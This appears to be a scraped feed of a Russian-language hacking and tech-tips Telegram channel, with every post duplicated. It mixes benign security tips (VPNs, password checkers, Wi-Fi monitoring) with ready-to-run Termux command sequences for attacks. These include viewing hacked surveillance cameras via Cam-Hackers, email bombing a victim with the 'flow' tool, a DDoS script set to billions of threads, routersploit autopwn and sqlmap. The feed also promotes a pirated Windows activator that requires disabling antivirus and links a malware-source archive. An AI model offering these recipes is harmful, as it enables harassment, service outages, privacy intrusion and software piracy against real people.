Как узнать кто пользуется вашим Wi-Fi
Если вы начали замечать регулярные подвисания в своей сети, возможно, у нее появились новые, совершенно нежелательные пользователи. Самой простой способ решить проблему - поменять пароль от Wi-Fi.
Но тут есть пара нюансов. Во-перых, это не защитит сеть от повторного проникновения, во-вторых, «виновник» останется анонимным.
Как понять, что кто-то подключился к вашему роутеру? Самый простой способ – это получить статистику трафика у интернет поставщика. Даже на странице сайта провайдера есть такие данные. Другой вариант - использовать специальный софт.
Who Is On My WiFi? - это инструмент, созданный для просмотра подключений к беспроводной сети. Программа идентифицирует все устройства, которые используют данную WiFi сеть, и вы можете видеть, какие девайсы были авторизованы.
Эта программа достаточно эффективная в обнаружении любых нежелательных посетителей, так как она покажет и IP адрес и MAC адрес, а также имя устройства - это один из ее плюсов.
Использование
В использовании программа очень проста, вам нужно запустить сканирование сети, потом отметить «Желательные» подключения. А те, что вы не знаете - отметить как «Не желательные».
Готово! В дальнейшем устройства с такой пометкой не смогут подключится к вашей сети!
📌 Windows: скачать
#безопасность #wifi #windows
Если вы начали замечать регулярные подвисания в своей сети, возможно, у нее появились новые, совершенно нежелательные пользователи. Самой простой способ решить проблему - поменять пароль от Wi-Fi.
Но тут есть пара нюансов. Во-перых, это не защитит сеть от повторного проникновения, во-вторых, «виновник» останется анонимным.
Как понять, что кто-то подключился к вашему роутеру? Самый простой способ – это получить статистику трафика у интернет поставщика. Даже на странице сайта провайдера есть такие данные. Другой вариант - использовать специальный софт.
Who Is On My WiFi? - это инструмент, созданный для просмотра подключений к беспроводной сети. Программа идентифицирует все устройства, которые используют данную WiFi сеть, и вы можете видеть, какие девайсы были авторизованы.
Эта программа достаточно эффективная в обнаружении любых нежелательных посетителей, так как она покажет и IP адрес и MAC адрес, а также имя устройства - это один из ее плюсов.
Использование
В использовании программа очень проста, вам нужно запустить сканирование сети, потом отметить «Желательные» подключения. А те, что вы не знаете - отметить как «Не желательные».
Готово! В дальнейшем устройства с такой пометкой не смогут подключится к вашей сети!
📌 Windows: скачать
#безопасность #wifi #windows
Проникаем во взломанные камеры
В наше время камеры видеонаблюдения установлены абсолютно повсюду. И хотя некоторые из них защищены действительно неплохо, большая часть вообще лишена какой-либо защиты. И происходит такое потому, что сам человек подходит к защите своих устройств несерьезно, и камеры тут - не исключение.
К чему все это? Дело в том, что энтузиасты собирают и публикуют в разные утилиты целые базы со взломанными камерами. Одна из таких называется Cam-Hackers, именно с ней мы сегодня и будем работать.
Настройка
Устанавливаем Termux
Прописываем команды в консоль:
▫️
Использование
После запуска у вас откроется меню с огромным количеством стран. Потребуется выбрать номер интересующей вас страны. После этого появятся ссылки на взломанные камеры. Готово! Теперь город под вашим наблюдением!
#хакинг #termux
В наше время камеры видеонаблюдения установлены абсолютно повсюду. И хотя некоторые из них защищены действительно неплохо, большая часть вообще лишена какой-либо защиты. И происходит такое потому, что сам человек подходит к защите своих устройств несерьезно, и камеры тут - не исключение.
К чему все это? Дело в том, что энтузиасты собирают и публикуют в разные утилиты целые базы со взломанными камерами. Одна из таких называется Cam-Hackers, именно с ней мы сегодня и будем работать.
Настройка
Устанавливаем Termux
Прописываем команды в консоль:
▫️
apt update & apt upgrade
▫️pip2 install requests
▫️git clone https://github.com/AngelSecurityTeam/Cam-Hackers
▫️cd Cam-Hackers
▫️python3 cam-hackers.py
Использование
После запуска у вас откроется меню с огромным количеством стран. Потребуется выбрать номер интересующей вас страны. После этого появятся ссылки на взломанные камеры. Готово! Теперь город под вашим наблюдением!
#хакинг #termux
Насколько безопасно указывать номер телефона при регистрации
Большинство администраторов сайтов наивно полагают, что один из самых безопасных вариантов регистрация пользователя на сервисе связан с задействованием номера телефона. Но так ли это на практике?
В современном обществе сложилось так, что смартфоны крепко освоились в нашей жизни. И из-за своей популярности, система Android часто подвергается хакерским атакам и взломам. К примеру, существуют вирусы удаленного доступа, которые позволяют полностью отслеживать устройство, или программы-шпионы, представляющие из себя сервер, что будет отправлять данные клиенту. Все это делает номер отнюдь не безопасным средством аутентификации.
Полагаю, многие могли заметить, как после привязки номера для регистрации, спустя какое-то время вас начинает атаковать всякого рода спам рассылка. А дело все в том, что нечестные на руку сервисы продают контактную информацию сторонним закупщикам целыми базами, а они, в свою очередь, используют номер для рекламы. Именно так и «всплывают» различные БД. И, тут как не крути, а остановить спам может только смена номера, после чего последуют проблемы с восстановлением аккаунтов, для которых этот номер был необходим.
По итогу можно сказать, что номер не является безопасным средством аутентификации. Как альтернативный вариант, советую использовать дополнительную почту для регистрации, дабы спам не захламлял основной ящик и номер телефона.
Также можно завести отдельный номер, если необходимость его привязки регулярная, а для подозрительных сайтов и сайтов, нужных лишь единожды, лучше и вовсе использовать недорогой разовый номер. Вот список проверенных ресурсов, где их можно купить.
#полезно #безопасность
Большинство администраторов сайтов наивно полагают, что один из самых безопасных вариантов регистрация пользователя на сервисе связан с задействованием номера телефона. Но так ли это на практике?
В современном обществе сложилось так, что смартфоны крепко освоились в нашей жизни. И из-за своей популярности, система Android часто подвергается хакерским атакам и взломам. К примеру, существуют вирусы удаленного доступа, которые позволяют полностью отслеживать устройство, или программы-шпионы, представляющие из себя сервер, что будет отправлять данные клиенту. Все это делает номер отнюдь не безопасным средством аутентификации.
Полагаю, многие могли заметить, как после привязки номера для регистрации, спустя какое-то время вас начинает атаковать всякого рода спам рассылка. А дело все в том, что нечестные на руку сервисы продают контактную информацию сторонним закупщикам целыми базами, а они, в свою очередь, используют номер для рекламы. Именно так и «всплывают» различные БД. И, тут как не крути, а остановить спам может только смена номера, после чего последуют проблемы с восстановлением аккаунтов, для которых этот номер был необходим.
По итогу можно сказать, что номер не является безопасным средством аутентификации. Как альтернативный вариант, советую использовать дополнительную почту для регистрации, дабы спам не захламлял основной ящик и номер телефона.
Также можно завести отдельный номер, если необходимость его привязки регулярная, а для подозрительных сайтов и сайтов, нужных лишь единожды, лучше и вовсе использовать недорогой разовый номер. Вот список проверенных ресурсов, где их можно купить.
#полезно #безопасность
Как устроить спам на почту через телефон
Почта в открытом доступе - это не очень хорошо, если вы перешли дорогу хакеру. Помимо брутфорс атак, email может подвергаться активному спаму.
Для проведения спам атаки хакеру потребуется создать несколько email аккаунтов, чтобы обойти систему спам блока, а также установить специальную утилиту для termux. Как это происходит? Давайте посмотрим:
Настройка
Устанавливаем Termux
Прописываем команды в консоль:
▫️
▫️
▫️
❗️Подобная атака может изрядно помучать жертву, особенно, если под ударом окажется корпоративная почта, необходимая для работы. Потому ни в коем случае не применяйте эти знания против других!
#хакинг #termux
Почта в открытом доступе - это не очень хорошо, если вы перешли дорогу хакеру. Помимо брутфорс атак, email может подвергаться активному спаму.
Для проведения спам атаки хакеру потребуется создать несколько email аккаунтов, чтобы обойти систему спам блока, а также установить специальную утилиту для termux. Как это происходит? Давайте посмотрим:
Настройка
Устанавливаем Termux
Прописываем команды в консоль:
▫️
apt update
▫️apt upgrade
▫️apt install git
▫️apt install python
▫️git clone https://github.com/denkus24/flow
▫️cd flow
Добавляем аккаунты, которые будут производить атаку:▫️
apt install nano
▫️cd flow
▫️nano bots.fd [email protected], password, [email protected], password и так дальше.
Использование▫️
python flow.py
Далее нужно ввести почту, на которую будет совершена спам атака.❗️Подобная атака может изрядно помучать жертву, особенно, если под ударом окажется корпоративная почта, необходимая для работы. Потому ни в коем случае не применяйте эти знания против других!
#хакинг #termux
Смартфон в роли загрузочного накопителя
С приложением DriveDroid больше не нужно прибегать к помощи USB-флешек и самозагружающихся дисков, чтобы установить операционную систему или запустить ее без инсталляции.
Данный инструмент превращает смартфон в самозагружаемый накопитель, который будет запускать на подключенном компьютере любой указанный образ диска: Windows, Linux или любую другую ОС. Иными словами, у вас будет карманная операционная система, которую вы сможете запустить на любом компьютере.
Настройка
1. Первым делом, приложению нужно предоставить Root-права и выдать все разрешения, затем подключить смартфон с помощью кабеля к компьютеру.
2. DriveDroid предложит выбрать предпочтительный метод работы, нажимаем на «Standard Android».
3. Указываем, какой тип подключенного носителя вы увидели на компьютере: USB, CD-ROM или никакого.
4. Теперь остается лишь перезагрузить ПК и попробовать загрузиться со смартфона.
После успешного тестирования, можно скачать образы нужных операционных в самом приложении, с которых будет возможна загрузка. Также, можно скачать ISO-образ Windows со сторонних ресурсов. Загрузить его следует во внутреннюю память смартфона или на SD-карту, а затем выбрать его при добавлении новой ОС в DriveDroid.
📌https://4pda.ru/forum/index.php?showtopic=405264
#хитрости
С приложением DriveDroid больше не нужно прибегать к помощи USB-флешек и самозагружающихся дисков, чтобы установить операционную систему или запустить ее без инсталляции.
Данный инструмент превращает смартфон в самозагружаемый накопитель, который будет запускать на подключенном компьютере любой указанный образ диска: Windows, Linux или любую другую ОС. Иными словами, у вас будет карманная операционная система, которую вы сможете запустить на любом компьютере.
Настройка
1. Первым делом, приложению нужно предоставить Root-права и выдать все разрешения, затем подключить смартфон с помощью кабеля к компьютеру.
2. DriveDroid предложит выбрать предпочтительный метод работы, нажимаем на «Standard Android».
3. Указываем, какой тип подключенного носителя вы увидели на компьютере: USB, CD-ROM или никакого.
4. Теперь остается лишь перезагрузить ПК и попробовать загрузиться со смартфона.
После успешного тестирования, можно скачать образы нужных операционных в самом приложении, с которых будет возможна загрузка. Также, можно скачать ISO-образ Windows со сторонних ресурсов. Загрузить его следует во внутреннюю память смартфона или на SD-карту, а затем выбрать его при добавлении новой ОС в DriveDroid.
📌https://4pda.ru/forum/index.php?showtopic=405264
#хитрости
Расширения. Автоматически проверяем пароли на утечку по базам
PassProtect - это расширение, которое сравнивает пользовательский пароль с крупной базой утечек Have I Been Pwned. В базе хранятся данные всех скомпрометированных крупных компаний и сервисов за последние семь лет.
Что важно, при проверке пользовательской почты и пароля по базе, расширение использует k-анонимность. Таким образом, информация не передается ни на сервера компании, ни на сайт Have I Been Pwned. При наличии слитого пароля в базе, на экране появляется уведомление, предлагающее варианты усиления пароля и защиты от утечек.
Данное расширение позволяет «с ходу» понимать, безопасны ли используемые вами пароли, или они уже находиться в базе злоумышленников. Проверка пароля происходит в реальном времени, автоматически. Вам не придется терять время на проверку вручную. Согласитесь, удобно.
📌https://www.passprotect.io/
#расширения #безопасность #приватность
PassProtect - это расширение, которое сравнивает пользовательский пароль с крупной базой утечек Have I Been Pwned. В базе хранятся данные всех скомпрометированных крупных компаний и сервисов за последние семь лет.
Что важно, при проверке пользовательской почты и пароля по базе, расширение использует k-анонимность. Таким образом, информация не передается ни на сервера компании, ни на сайт Have I Been Pwned. При наличии слитого пароля в базе, на экране появляется уведомление, предлагающее варианты усиления пароля и защиты от утечек.
Данное расширение позволяет «с ходу» понимать, безопасны ли используемые вами пароли, или они уже находиться в базе злоумышленников. Проверка пароля происходит в реальном времени, автоматически. Вам не придется терять время на проверку вручную. Согласитесь, удобно.
📌https://www.passprotect.io/
#расширения #безопасность #приватность
Как создать тысячи Gmail почт за секунды, имея один аккаунт
Возможно, некоторые из вас уже слышали о фиче Gmail с точками. Если поставить точку в любом месте адреса Gmail до знака @, то новый адрес будет являться уникальным и действующим. При этом все письма будут приходить на первоначальный адрес без точек. Для примера:
Допустим, у нас есть почта [email protected], но для гугла [email protected], [email protected] и [email protected] будет одним ящиком и если на любой из них слать письма, то попадут они в одну почту. Согласитесь, удобно, когда при повторных регистрациях на сайте не нужно создавать новый аккаунт.
Ну а если есть необходимость в создании сотен и тысяч таких почт, то стоит воспользоваться ресурсом thebot.net. Нужно ишь помнить, что чем больше символов в вашем email, тем больше можно сгенерировать почт.
📌 https://thebot.net/api/gmail/
#хитрости
Возможно, некоторые из вас уже слышали о фиче Gmail с точками. Если поставить точку в любом месте адреса Gmail до знака @, то новый адрес будет являться уникальным и действующим. При этом все письма будут приходить на первоначальный адрес без точек. Для примера:
Допустим, у нас есть почта [email protected], но для гугла [email protected], [email protected] и [email protected] будет одним ящиком и если на любой из них слать письма, то попадут они в одну почту. Согласитесь, удобно, когда при повторных регистрациях на сайте не нужно создавать новый аккаунт.
Ну а если есть необходимость в создании сотен и тысяч таких почт, то стоит воспользоваться ресурсом thebot.net. Нужно ишь помнить, что чем больше символов в вашем email, тем больше можно сгенерировать почт.
📌 https://thebot.net/api/gmail/
#хитрости
Активатор Windows и Office
Если вы испытываете трудности с лицензией или поиском ключа (либо его вообще нет), стоит воспользоваться «Re-Loader Activator». Ее функционал заключается в автоматической активации операционной системы Windows и офисного пакета приложений Microsoft Office.
Re-Loader способен активировать все версии Windows, а что касается Microsoft Office, то работает с такими версиями, как 2010/2013/2016.
Настройка
1. Отключаем антивирус на короткий промежуток времени (в том числе и встроенный защитник)
2. Запускаем Re-Loader Activator и нажимаем кнопку «Принять».
3. Нажимаем на значок программы или системы, которую необходимо активировать.
4. Ждем несколько секунд и радуемся активации.
Принцип активации построен на автоматической подборке лучшего метода взлома под определенную версию Windows или Microsoft Office.
📌 https://windows10activation.ru/activator/13-re-loader-activator.html
#windows
Если вы испытываете трудности с лицензией или поиском ключа (либо его вообще нет), стоит воспользоваться «Re-Loader Activator». Ее функционал заключается в автоматической активации операционной системы Windows и офисного пакета приложений Microsoft Office.
Re-Loader способен активировать все версии Windows, а что касается Microsoft Office, то работает с такими версиями, как 2010/2013/2016.
Настройка
1. Отключаем антивирус на короткий промежуток времени (в том числе и встроенный защитник)
2. Запускаем Re-Loader Activator и нажимаем кнопку «Принять».
3. Нажимаем на значок программы или системы, которую необходимо активировать.
4. Ждем несколько секунд и радуемся активации.
Принцип активации построен на автоматической подборке лучшего метода взлома под определенную версию Windows или Microsoft Office.
📌 https://windows10activation.ru/activator/13-re-loader-activator.html
#windows
Клонируем приложения на Аndroid
Представьте ситуацию, когда вам потребовалось иметь «левый» WhatsApp, или же необходим второй ТГ. Для создания копий приложений причин может быть множество. Ну а поможет в этом программа App Cloner.
App Cloner позволяет менять цифровую подпись приложений, благодаря чему вы можете установить копии любой игры или программы. Клонированные приложения устанавливаются параллельно и работают независимо от своих оригинальных версий.
Приложение базовой версии распространяется бесплатно, но, к сожалению, в нем доступен лишь стандартный функционал, который ограничивается одним приложением-клоном и коротким списком возможных программ для клонирования.
Однако в премиум версии (ссылочку на которую я оставил) будет доступен более обширный функционал, включающий возможность создания более двух клонов приложения, смену значков приложений, поддержку многооконного запуска приложений, возможность смены Android ID, и много чего еще.
Кстати, программа позволяет прятать IMEI и MAC-адрес Wi-Fi и подменять местоположения. Вообщем, полезная утилита.
📌 https://4pda.ru/forum/index.php?showtopic=728647
#приложения #android
Представьте ситуацию, когда вам потребовалось иметь «левый» WhatsApp, или же необходим второй ТГ. Для создания копий приложений причин может быть множество. Ну а поможет в этом программа App Cloner.
App Cloner позволяет менять цифровую подпись приложений, благодаря чему вы можете установить копии любой игры или программы. Клонированные приложения устанавливаются параллельно и работают независимо от своих оригинальных версий.
Приложение базовой версии распространяется бесплатно, но, к сожалению, в нем доступен лишь стандартный функционал, который ограничивается одним приложением-клоном и коротким списком возможных программ для клонирования.
Однако в премиум версии (ссылочку на которую я оставил) будет доступен более обширный функционал, включающий возможность создания более двух клонов приложения, смену значков приложений, поддержку многооконного запуска приложений, возможность смены Android ID, и много чего еще.
Кстати, программа позволяет прятать IMEI и MAC-адрес Wi-Fi и подменять местоположения. Вообщем, полезная утилита.
📌 https://4pda.ru/forum/index.php?showtopic=728647
#приложения #android
Самая масштабная атака в истории Twitter: взломаны аккаунты звезд, компаний и криптовалютных бирж
Минувшая ночь была трудной для компании Twitter: массовой компрометации подверглось множество аккаунтов публичных людей, компаний, криптовалютных бирж и так далее.
Так, среди пострадавших были: Билл Гейтс, Илон Маск, Джефф Безос, Джо Байден, Барак Обама, Уоррен Баффет, Канье Уэст, Ким Кардашян, компании Apple и Uber, крупнейшие криптовалютные биржи CoinDesk, Binance и Gemini, а также многие, многие другие. Для большинства этих учетных записей была включена двухфакторная аутентификация, которая не остановила хакеров.
Полученным доступом к топовым аккаунтам неизвестные злоумышленники воспользовались весьма странным образом: объявили аттракцион неслыханной щедрости и устроили фальшивую раздачу биткоинов. Сообщения хакеров сулили пользователям огромные прибыли (если те сначала отправят на указанный немного биткоинов).
Так как для всех взломанных аккаунтов использовались одинаковые сообщения и один и тот же биткоин-кошелек, можно увидеть, что по состоянию на 6:30 по московскому времени мошенники «заработали» примерно 13 BTC, то есть около 120 000 долларов.
Заявление Twitter
Глава Twitter Джек Дорси сообщает, что это крайне тяжелый день для компании и обещает, что расследование произошедшего будет максимально прозрачным.
В настоящий момент предварительные результаты расследования таковы. Twitter официально сообщает, что в корне случившегося лежит скоординированная атака на сотрудников компании с применением социальной инженерии. В результате злоумышленники смогли получить доступ к неназванным внутренним системам и инструментам, чем они и воспользовались, захватив контроль над множеством популярных аккаунтов.
#хакеры
Минувшая ночь была трудной для компании Twitter: массовой компрометации подверглось множество аккаунтов публичных людей, компаний, криптовалютных бирж и так далее.
Так, среди пострадавших были: Билл Гейтс, Илон Маск, Джефф Безос, Джо Байден, Барак Обама, Уоррен Баффет, Канье Уэст, Ким Кардашян, компании Apple и Uber, крупнейшие криптовалютные биржи CoinDesk, Binance и Gemini, а также многие, многие другие. Для большинства этих учетных записей была включена двухфакторная аутентификация, которая не остановила хакеров.
Полученным доступом к топовым аккаунтам неизвестные злоумышленники воспользовались весьма странным образом: объявили аттракцион неслыханной щедрости и устроили фальшивую раздачу биткоинов. Сообщения хакеров сулили пользователям огромные прибыли (если те сначала отправят на указанный немного биткоинов).
Так как для всех взломанных аккаунтов использовались одинаковые сообщения и один и тот же биткоин-кошелек, можно увидеть, что по состоянию на 6:30 по московскому времени мошенники «заработали» примерно 13 BTC, то есть около 120 000 долларов.
Заявление Twitter
Глава Twitter Джек Дорси сообщает, что это крайне тяжелый день для компании и обещает, что расследование произошедшего будет максимально прозрачным.
В настоящий момент предварительные результаты расследования таковы. Twitter официально сообщает, что в корне случившегося лежит скоординированная атака на сотрудников компании с применением социальной инженерии. В результате злоумышленники смогли получить доступ к неназванным внутренним системам и инструментам, чем они и воспользовались, захватив контроль над множеством популярных аккаунтов.
#хакеры
Устраиваем DDoS атаку на сайт со смартфона
DDoS - это атака на сайт с целью выведения его из строя при помощи значительного количества обманных запросов. Серверам приходится обрабатывать превышенный объем запросов, с чем они, как правило, не справляются.
Недавно мы уже разобрались с принципом подобной атаки на Wi-Fi, ну а сегодня жертвой выступит сайт.
❗️Давайте сразу внесем ясность. Данную атаку следует проводить только на свои ресурсы с целью выяснить, как поведет себя сайт и его защита!
Настройка
Устанавливаем Termux
Прописываем команды в консоль:
▫️
Использование
Далее просто пишем адрес сайта. В строчке "threads" вводим
#хакинг #DDoS
DDoS - это атака на сайт с целью выведения его из строя при помощи значительного количества обманных запросов. Серверам приходится обрабатывать превышенный объем запросов, с чем они, как правило, не справляются.
Недавно мы уже разобрались с принципом подобной атаки на Wi-Fi, ну а сегодня жертвой выступит сайт.
❗️Давайте сразу внесем ясность. Данную атаку следует проводить только на свои ресурсы с целью выяснить, как поведет себя сайт и его защита!
Настройка
Устанавливаем Termux
Прописываем команды в консоль:
▫️
pkg update
▫️pkg install git python
▫️cd
▫️git clone https://github.com/Andrey-oss/ddoser
▫️cd ddoser
▫️pip3 install requests termcolor colorama
▫️python3 ddos.py
Использование
Далее просто пишем адрес сайта. В строчке "threads" вводим
9999999999999
. Готово!#хакинг #DDoS
Создаем надежный пароль
Ненадежный пароль может легко перечеркнуть все ваши дальнейшие усилия по защите ваших конфиденциальных данных, потому этому стоит уделить особое внимание. Чтобы создать максимально сильный пароль, мы воспользуемся ресурсом Getpass.
Getpass - это необычный генератор паролей. Дело в том, что он производит генерацию на основе самых редких символов, которые встречаются на раскладке клавиатуры. Данный сайт делает уклон именно на сложность пароля, а не на его запоминаемость. Такой подход ресурса обрекает на провал любые попытки взломать вас атакой Brute-force.
📌https://getpass.xyz/
#безопасность
Ненадежный пароль может легко перечеркнуть все ваши дальнейшие усилия по защите ваших конфиденциальных данных, потому этому стоит уделить особое внимание. Чтобы создать максимально сильный пароль, мы воспользуемся ресурсом Getpass.
Getpass - это необычный генератор паролей. Дело в том, что он производит генерацию на основе самых редких символов, которые встречаются на раскладке клавиатуры. Данный сайт делает уклон именно на сложность пароля, а не на его запоминаемость. Такой подход ресурса обрекает на провал любые попытки взломать вас атакой Brute-force.
📌https://getpass.xyz/
#безопасность
Стираем абсолютно все данные с ПК
Одна из основ приватности - умение стирать «следы». Не важно, решили ли вы продать старое устройство, или же вам «постучались в дверь», научиться этому однозначно стоит.
O&O SafeErase Professional - инструмент для полного удаления файлов с компьютера и очистки дисков от их остатков. Программа позволяет безвозвратно стирать ваши файлы и папки, удалять следы использования интернет браузера и операционной системы, а также очищать свободное дисковое пространство от ранее удалённых файлов.
С помощью O&O SafeErase вы сможете безвозвратно стереть все личные файлы и следы работы в системе, не переживая что их в будущем смогут восстановить.
Использование специальных алгоритмов и возможности использовать один из шести методов стирания данных, позволяет не только выполнить быстрое удаление информации, путём перезаписи данных нулями, но и осуществить полную очистку особо конфиденциальной информации с помощью 35 циклов стирания.
📌 Win64: Скачать
📌 Win32: Скачать
#windows #приватность
Одна из основ приватности - умение стирать «следы». Не важно, решили ли вы продать старое устройство, или же вам «постучались в дверь», научиться этому однозначно стоит.
O&O SafeErase Professional - инструмент для полного удаления файлов с компьютера и очистки дисков от их остатков. Программа позволяет безвозвратно стирать ваши файлы и папки, удалять следы использования интернет браузера и операционной системы, а также очищать свободное дисковое пространство от ранее удалённых файлов.
С помощью O&O SafeErase вы сможете безвозвратно стереть все личные файлы и следы работы в системе, не переживая что их в будущем смогут восстановить.
Использование специальных алгоритмов и возможности использовать один из шести методов стирания данных, позволяет не только выполнить быстрое удаление информации, путём перезаписи данных нулями, но и осуществить полную очистку особо конфиденциальной информации с помощью 35 циклов стирания.
📌 Win64: Скачать
📌 Win32: Скачать
#windows #приватность
Выбираем лучший бесплатный VPN
Как известно, большинство VPN сервисов предоставляют бесплатный тариф ли же бесплатный пробный период, но не каждый из них может похвастаться отличной скоростью и безопасностью соединения.
Более того, многие VPN-сервисы, особенно мобильных версий, переполнены рекламой, проблемами с утечкой DNS и запрашивают слишком много разрешений. В этом посте мы поговорим о двух кроссплатформенных VPN сервисах, которые доступны совершенно бесплатно.
ProtonVPN Free — Швейцарский VPN, отличается тем, что бесплатно предлагает безлимитный доступ на одном устройстве. Бесплатные пользователи получают доступ к серверам в трёх странах: США, Нидерландах и Японии. Нет доступа к протоколам P2P, Tor, безопасной потоковой трансляции и серверам Secure Core. Всё это доступно платным подписчикам.
Сервис ведёт свои операции максимально прозрачно. Подробно описываются запросы от правоохранительных органов. Логи не ведутся, поэтому никаких ответов на эти запросы быть не может.
Windscribe Free — Канадский сервис, который оказался самым быстрым из протестированных и предлагает 10 Гб в месяц. Приложения доступны на всех операционных системах. Пользователи бесплатного сервиса получают доступ к серверам в 10 странах: США, Канада, Франция, Германия, Нидерланды, Норвегия, Румыния, Швейцария, Великобритания и Гонконг.
Имеется большой выбор функций безопасности, отсутствие логов действий пользователей и регулярные обновления отчёта о прозрачности. Поскольку логи не ведутся, никакой информации правоохранительные органы получить не могут.
#полезно #приватность
Как известно, большинство VPN сервисов предоставляют бесплатный тариф ли же бесплатный пробный период, но не каждый из них может похвастаться отличной скоростью и безопасностью соединения.
Более того, многие VPN-сервисы, особенно мобильных версий, переполнены рекламой, проблемами с утечкой DNS и запрашивают слишком много разрешений. В этом посте мы поговорим о двух кроссплатформенных VPN сервисах, которые доступны совершенно бесплатно.
ProtonVPN Free — Швейцарский VPN, отличается тем, что бесплатно предлагает безлимитный доступ на одном устройстве. Бесплатные пользователи получают доступ к серверам в трёх странах: США, Нидерландах и Японии. Нет доступа к протоколам P2P, Tor, безопасной потоковой трансляции и серверам Secure Core. Всё это доступно платным подписчикам.
Сервис ведёт свои операции максимально прозрачно. Подробно описываются запросы от правоохранительных органов. Логи не ведутся, поэтому никаких ответов на эти запросы быть не может.
Windscribe Free — Канадский сервис, который оказался самым быстрым из протестированных и предлагает 10 Гб в месяц. Приложения доступны на всех операционных системах. Пользователи бесплатного сервиса получают доступ к серверам в 10 странах: США, Канада, Франция, Германия, Нидерланды, Норвегия, Румыния, Швейцария, Великобритания и Гонконг.
Имеется большой выбор функций безопасности, отсутствие логов действий пользователей и регулярные обновления отчёта о прозрачности. Поскольку логи не ведутся, никакой информации правоохранительные органы получить не могут.
#полезно #приватность
Тестируем роутер на уязвимости со смартфона
Читатели моего канала не понаслышке знают, что, установив пароль на роутер, вы защищаете свою сеть лишь от честных людей. Многие роутеры уже «из коробки» имеют ряд уязвимостей, которые можно отключить в настройках. Например, уязвимость удаленного доступа, стандартный пароль в локальной сети и т.д.
Чтобы проверить роутер на различные виды уязвимостей, можно воспользоваться утилитой routersploit на termux.
Настройка
Устанавливаем Termux и подключаемся к роутеру.
Прописываем команды в консоль:
▫️
▫️
▫️
#безопасность
Читатели моего канала не понаслышке знают, что, установив пароль на роутер, вы защищаете свою сеть лишь от честных людей. Многие роутеры уже «из коробки» имеют ряд уязвимостей, которые можно отключить в настройках. Например, уязвимость удаленного доступа, стандартный пароль в локальной сети и т.д.
Чтобы проверить роутер на различные виды уязвимостей, можно воспользоваться утилитой routersploit на termux.
Настройка
Устанавливаем Termux и подключаемся к роутеру.
Прописываем команды в консоль:
▫️
pkg upgrade
▫️pkg install git python
▫️git clone https://github.com/threat9/routersploit
▫️cd routersploit
▫️pip3 install -r requirements.txt
▫️python3 rsf.py
Использование▫️
use scanners/autopwn
Есть 2 вида шлюза. 192.168.0.1 и 192.168.1.1. Выбирайте ваш и пишите:▫️
set target 192.168.0.1
▫️run
Далее будет произведено сканирование на уязвимости. Если вы их обнаружите, то пишите название уязвимости в поисковике Google и ищите методы их устранения. #безопасность
Где найти вирусы с исходным кодом
Отыскать сборник актуальных вирусов, а уж тем более с описанием и исходниками — задача не из легких. Но только не для подписчиков CODE RED!
Изначально проект TheZoo создан для того, чтобы сделать анализ вредоносных программ открытым и доступным для общественности. Авторы постоянно обновляют и дополняют свою базу новыми вирусами. Для скачивания и изучения предлагается как исполняемый файл, так и исходники.
Исходный код вирусов находятся в каталоге:
Подробное описание и руководство, вы сможете найти в описании проекта на Githab.
📌https://github.com/ytisf/theZoo
❗️Напомню, использовать вирусы против других - незаконно и не рекомендуется!
#хакинг
Отыскать сборник актуальных вирусов, а уж тем более с описанием и исходниками — задача не из легких. Но только не для подписчиков CODE RED!
Изначально проект TheZoo создан для того, чтобы сделать анализ вредоносных программ открытым и доступным для общественности. Авторы постоянно обновляют и дополняют свою базу новыми вирусами. Для скачивания и изучения предлагается как исполняемый файл, так и исходники.
Исходный код вирусов находятся в каталоге:
theZoo/malwares/Source/Original/
Исполняемые файлы вирусов находятся в каталоге:theZoo/malwares/Binaries/
Для каждого вируса есть своя отдельная директория, в которой находятся 4 файла: само вредоносное ПО в зашифрованном виде, в ZIP архиве, SHA256 и MD5 — контрольные суммы архива для сравнения и пароль для зашифрованного архива.Подробное описание и руководство, вы сможете найти в описании проекта на Githab.
📌https://github.com/ytisf/theZoo
❗️Напомню, использовать вирусы против других - незаконно и не рекомендуется!
#хакинг
Каждый 142 пароль - 123456. Как создавать безопасные пароли?
Эксперт в области Компьютерных Технологий - Ата Хаксил провел исследование на тему использования паролей. Под его анализ попало более 1 миллиарда слитых учетных данных!
Ата анализировал доступные в Сети БД — часть из них, например, лежала на GitHub и GitLab, другая часть распространялась через хакерские форумы и файлообменники.
Специалист проанализировал более миллиарда связок и выяснил, что только 168 919 919 паролей являются уникальными. А «123456» эксперт встретил целых 7 миллионов раз.
Кроме того, автор исследования установил среднюю длину паролей – 9,48 символов (часто рекомендуется использовать от 16 и до 24 символов).
Только 12% комбинаций при этом содержали специальные символы. 29% паролей состояли только из букв, 13% – только из цифр. Разумеется, в подборе таких паролей нет ничего сложного.
P.S. Ниже я приложил схему, наглядно демонстрирующую, каких еще ошибок стоит избегать при создании паролей.
#полезно #безопасность
Эксперт в области Компьютерных Технологий - Ата Хаксил провел исследование на тему использования паролей. Под его анализ попало более 1 миллиарда слитых учетных данных!
Ата анализировал доступные в Сети БД — часть из них, например, лежала на GitHub и GitLab, другая часть распространялась через хакерские форумы и файлообменники.
Специалист проанализировал более миллиарда связок и выяснил, что только 168 919 919 паролей являются уникальными. А «123456» эксперт встретил целых 7 миллионов раз.
Кроме того, автор исследования установил среднюю длину паролей – 9,48 символов (часто рекомендуется использовать от 16 и до 24 символов).
Только 12% комбинаций при этом содержали специальные символы. 29% паролей состояли только из букв, 13% – только из цифр. Разумеется, в подборе таких паролей нет ничего сложного.
P.S. Ниже я приложил схему, наглядно демонстрирующую, каких еще ошибок стоит избегать при создании паролей.
#полезно #безопасность
Делаем SQL инъекцию с помощью телефона
SQL инъекция — это один из самых доступных способов взлома сайта. Суть таких инъекций – внедрение в данные (передаваемые через GET, POST запросы или значения Cookie) произвольного SQL кода. Если сайт уязвим и выполняет такие инъекции, то по сути есть возможность творить с БД (чаще всего это MySQL) что угодно. Данная атака позволяет находить базы данных пользователей различных сайтов, обходить авторизацию, тестировать ресурсы и многое другое.
Настройка
Устанавливаем Termux
Прописываем команды в консоль:
▫️
▫️
📌 https://github.com/sqlmapproject/sqlmap/wiki/Usage
❗️Помни, вся информация предоставлена исключительно в ознакомительных целях.
#хакинг
SQL инъекция — это один из самых доступных способов взлома сайта. Суть таких инъекций – внедрение в данные (передаваемые через GET, POST запросы или значения Cookie) произвольного SQL кода. Если сайт уязвим и выполняет такие инъекции, то по сути есть возможность творить с БД (чаще всего это MySQL) что угодно. Данная атака позволяет находить базы данных пользователей различных сайтов, обходить авторизацию, тестировать ресурсы и многое другое.
Настройка
Устанавливаем Termux
Прописываем команды в консоль:
▫️
pkg upgrade
▫️pkg install python2 git
▫️git clone https://github.com/sqlmapproject/sqlmap.git
▫️cd sqlmap
